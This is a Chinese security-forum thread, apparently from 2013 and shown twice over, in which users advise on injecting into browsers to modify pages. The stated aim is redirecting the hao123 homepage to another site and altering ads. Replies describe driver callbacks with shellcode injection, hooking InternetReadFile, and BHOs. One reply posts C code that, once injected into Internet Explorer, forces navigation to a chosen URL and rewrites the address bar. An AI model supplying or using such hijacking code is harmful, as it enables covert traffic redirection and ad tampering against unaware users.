[求助]请教下hook浏览器修改页面的方案-编程技术-看雪-安全社区|安全招聘|kanxue.com

最新回复 (11)
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 2 楼 ie8这样的有多个进程,每个进程都得做手脚 2013-8-23 17:47 0
yjiiyygyx 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 72 粉丝 0 关注私信	yjiiyygyx 3 楼 BHO... 2013-8-23 17:53 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 4 楼每个我都注入了，第一次能半成功吧，第二次又正常了这是修改hao123为hao345的图片上传的附件：未命名.jpg （37.41kb，1次下载） 2013-8-23 18:05 0
遗失灵魂雪币： 220 活跃值： (117) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 372 粉丝 0 关注私信	遗失灵魂 5 楼缓存。。。 2013-8-25 08:30 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 6 楼关键是改命令行，自己悟吧~我使用sys 注册回调,shellcode注入浏览器，修改命令行，所有浏览器通杀,楼上说的对，ie需要清理缓存，其他的不用~ 2013-8-26 11:28 0
遗失灵魂雪币： 220 活跃值： (117) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 372 粉丝 0 关注私信	遗失灵魂 7 楼 hook wininet的InternetReadFile ie内核的有部分数据是直接从本地拿的(chrome貌似更多) 也就是缓存机制这时候不能光InternetReadFile 建议还是BHO吧 2013-8-26 17:15 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 8 楼 dll 都注入了，还用bho么,枚举框架 IEFRAME 找到框架，然后获得 webbrowser 对象，得到比如 IDocument对象指针可以改html内容，比如改广告，还有 IHtmlxxxx指针可以改navite等，，，，我这么写的。。 2013-8-26 20:22 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 9 楼貌似好牛啊，可是我对IE框架什么的不懂啊0.0连html语法都不咋懂 2013-8-26 23:27 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 10 楼逼我~ BOOL CALLBACK EnumProc1(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, "Edit")) { (HWND )lParam = hWnd; return FALSE; } return TRUE; } BOOL LockURL(LPCSTR lpURL) { DWORD dwCurrentPId = GetCurrentProcessId(); HWND hWnd = FindWindowEx(NULL, NULL, "IEFrame", NULL); while (hWnd) { DWORD dwPId; GetWindowThreadProcessId(hWnd, &dwPId); if (dwPId == dwCurrentPId) { HWND hEdit = NULL; EnumChildWindows(hWnd, EnumProc1, (LPARAM)&hEdit); if (hEdit) { SendMessage(hEdit, WM_SETTEXT, 0, (LPARAM)lpURL); dbgprintf(("set url '%s' to Edit 0x%08X\n", lpURL, hEdit)); return TRUE; } } hWnd = FindWindowEx(NULL, hWnd, "IEFrame", NULL); } return FALSE; } /////////////////////////////////////////////////////////////////// // 连接WebBrowser调用Navigate的线程 /////////////////////////////////////////////////////////////////// BOOL CALLBACK EnumProc(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, "Internet Explorer_Server")) { (HWND )lParam = hWnd; return FALSE; } return TRUE; } DWORD CALLBACK ThreadProc(LPVOID lpVoid) { CoInitialize(NULL); HWND hWnd = (HWND)lpVoid; while (IsWindow(hWnd)) { HWND hIEWnd = NULL; EnumChildWindows(hWnd, EnumProc, (LPARAM)&hIEWnd); if (hIEWnd) { dbgprintf(("IE_Server found 0x%08X.\n", hIEWnd)); IHTMLDocument2 pdoc = NULL; IHTMLWindow2 pwnd = NULL; DWORD res = 0; HRESULT hr; SendMessageTimeout(hIEWnd, RegisterWindowMessage("WM_HTML_GETOBJECT"), 0, 0, SMTO_ABORTIFHUNG, 1000, &res); if (res) { hr = ObjectFromLresult(res, IID_IHTMLDocument2, 0, (void*)&pdoc); if (pdoc) { dbgprintf(("IHTMLDocument2 got 0x%08X.\n", pdoc)); hr = pdoc->get_parentWindow(&pwnd); if (pwnd) { dbgprintf(("IHTMLWindow2 got 0x%08X.\n", pwnd)); BSTR pURL = SysAllocString(urlW); hr = pwnd->navigate(pURL); SysFreeString(pURL); if (hr == S_OK) { LockURL(url); dbgprintf(("final navigate\n")); } / IWebBrowser pwb = NULL; hr = psp->QueryService(IID_IWebBrowserApp, IID_IWebBrowser2, (void )pwb); if (pwb) { dbgprintf(("IWebBrowser got 0x%08X.\n", pwb)); pwb->Release(); return 0; } / pwnd->Release(); return 0; } pdoc->Release(); } } } Sleep(200); } return 0; } 2013-8-27 15:30 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 11 楼 [QUOTE=专业黑子;1215129]逼我~ BOOL CALLBACK EnumProc1(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, ...[/QUOTE] 谢谢了！ 2013-8-27 17:47 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 12 楼不要客气~！ 2013-8-27 17:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (11)
xiejienet 雪币： 142 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 639 粉丝 0 关注私信	xiejienet 2 楼 ie8这样的有多个进程,每个进程都得做手脚 2013-8-23 17:47 0
yjiiyygyx 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 72 粉丝 0 关注私信	yjiiyygyx 3 楼 BHO... 2013-8-23 17:53 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 4 楼每个我都注入了，第一次能半成功吧，第二次又正常了这是修改hao123为hao345的图片上传的附件：未命名.jpg （37.41kb，1次下载） 2013-8-23 18:05 0
遗失灵魂雪币： 220 活跃值： (117) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 372 粉丝 0 关注私信	遗失灵魂 5 楼缓存。。。 2013-8-25 08:30 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 6 楼关键是改命令行，自己悟吧~我使用sys 注册回调,shellcode注入浏览器，修改命令行，所有浏览器通杀,楼上说的对，ie需要清理缓存，其他的不用~ 2013-8-26 11:28 0
遗失灵魂雪币： 220 活跃值： (117) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 372 粉丝 0 关注私信	遗失灵魂 7 楼 hook wininet的InternetReadFile ie内核的有部分数据是直接从本地拿的(chrome貌似更多) 也就是缓存机制这时候不能光InternetReadFile 建议还是BHO吧 2013-8-26 17:15 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 8 楼 dll 都注入了，还用bho么,枚举框架 IEFRAME 找到框架，然后获得 webbrowser 对象，得到比如 IDocument对象指针可以改html内容，比如改广告，还有 IHtmlxxxx指针可以改navite等，，，，我这么写的。。 2013-8-26 20:22 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 9 楼貌似好牛啊，可是我对IE框架什么的不懂啊0.0连html语法都不咋懂 2013-8-26 23:27 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 10 楼逼我~ BOOL CALLBACK EnumProc1(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, "Edit")) { (HWND )lParam = hWnd; return FALSE; } return TRUE; } BOOL LockURL(LPCSTR lpURL) { DWORD dwCurrentPId = GetCurrentProcessId(); HWND hWnd = FindWindowEx(NULL, NULL, "IEFrame", NULL); while (hWnd) { DWORD dwPId; GetWindowThreadProcessId(hWnd, &dwPId); if (dwPId == dwCurrentPId) { HWND hEdit = NULL; EnumChildWindows(hWnd, EnumProc1, (LPARAM)&hEdit); if (hEdit) { SendMessage(hEdit, WM_SETTEXT, 0, (LPARAM)lpURL); dbgprintf(("set url '%s' to Edit 0x%08X\n", lpURL, hEdit)); return TRUE; } } hWnd = FindWindowEx(NULL, hWnd, "IEFrame", NULL); } return FALSE; } /////////////////////////////////////////////////////////////////// // 连接WebBrowser调用Navigate的线程 /////////////////////////////////////////////////////////////////// BOOL CALLBACK EnumProc(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, "Internet Explorer_Server")) { (HWND )lParam = hWnd; return FALSE; } return TRUE; } DWORD CALLBACK ThreadProc(LPVOID lpVoid) { CoInitialize(NULL); HWND hWnd = (HWND)lpVoid; while (IsWindow(hWnd)) { HWND hIEWnd = NULL; EnumChildWindows(hWnd, EnumProc, (LPARAM)&hIEWnd); if (hIEWnd) { dbgprintf(("IE_Server found 0x%08X.\n", hIEWnd)); IHTMLDocument2 pdoc = NULL; IHTMLWindow2 pwnd = NULL; DWORD res = 0; HRESULT hr; SendMessageTimeout(hIEWnd, RegisterWindowMessage("WM_HTML_GETOBJECT"), 0, 0, SMTO_ABORTIFHUNG, 1000, &res); if (res) { hr = ObjectFromLresult(res, IID_IHTMLDocument2, 0, (void*)&pdoc); if (pdoc) { dbgprintf(("IHTMLDocument2 got 0x%08X.\n", pdoc)); hr = pdoc->get_parentWindow(&pwnd); if (pwnd) { dbgprintf(("IHTMLWindow2 got 0x%08X.\n", pwnd)); BSTR pURL = SysAllocString(urlW); hr = pwnd->navigate(pURL); SysFreeString(pURL); if (hr == S_OK) { LockURL(url); dbgprintf(("final navigate\n")); } / IWebBrowser pwb = NULL; hr = psp->QueryService(IID_IWebBrowserApp, IID_IWebBrowser2, (void )pwb); if (pwb) { dbgprintf(("IWebBrowser got 0x%08X.\n", pwb)); pwb->Release(); return 0; } / pwnd->Release(); return 0; } pdoc->Release(); } } } Sleep(200); } return 0; } 2013-8-27 15:30 0
bxc 雪币： 7048 活跃值： (3527) 能力值： ( LV12，RANK：340 ) 在线值：发帖 245 回帖 1332 粉丝 26 关注私信	bxc 6 11 楼 [QUOTE=专业黑子;1215129]逼我~ BOOL CALLBACK EnumProc1(HWND hWnd, LPARAM lParam) { CHAR sClass[256]; GetClassName(hWnd, sClass, sizeof(sClass)); if (!strcmp(sClass, ...[/QUOTE] 谢谢了！ 2013-8-27 17:47 0
专业黑子雪币： 7 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 109 粉丝 0 关注私信	专业黑子 12 楼不要客气~！ 2013-8-27 17:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复